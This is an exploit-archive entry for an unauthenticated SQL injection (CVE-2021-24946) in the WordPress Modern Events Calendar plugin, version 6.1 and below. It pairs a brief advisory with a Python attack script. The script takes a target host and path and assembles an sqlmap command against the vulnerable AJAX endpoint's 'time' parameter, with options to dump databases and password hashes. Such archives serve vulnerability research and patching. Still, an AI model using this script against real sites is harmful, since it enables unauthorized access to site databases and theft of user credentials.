WordPress Modern Events Calendar 6.1 SQL Injection

WordPress Modern Events Calendar plugin versions 6.1 and below suffer from an unauthenticated remote SQL injection vulnerability.

MD5 | 072f2b4d4bc04c1eb3516c69bee38723

# Exploit Title: WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
# Date 26.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.6.1.0.zip
# Version: <= 6.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-24946
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md

The Modern Events Calendar Lite WordPress plugin before 6.1.5 does not sanitise and escape the time parameter
before using it in a SQL statement in the mec_load_single_page AJAX action, available to unauthenticated users,
leading to an unauthenticated SQL injection issue

banner = '''

.oOOOo. o 'O o.OOoOoo
.O o O o O .oOOo. .oOOo. .oOOo. oO .oOOo. o O .oOOo. o O .oOOo.
o o O o O O o O O O O o O o O o O
o o o ooOO o o O o o o o o o O o o o
o O O' O ooooooooo O' o o O' O ooooooooo O' OooOOo `OooOo OooOOo OoOOo.
O `o o o O O O O o O O O O O O
`o .o `o O O .O o O .O O .O o o o O o
`OoooO' `o' ooOooOoO oOoOoO `OooO' oOoOoO OooOO oOoOoO O `OooO' O `OooO'

[+] Modern Events Calendar Lite SQL-Injection
[@] Developed by Ron Jost (Hacker5preme)



import requests
import argparse
from datetime import datetime
import os

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH

# Exploit:
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + retrieve_mode + exploitcode_risk
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

Related Posts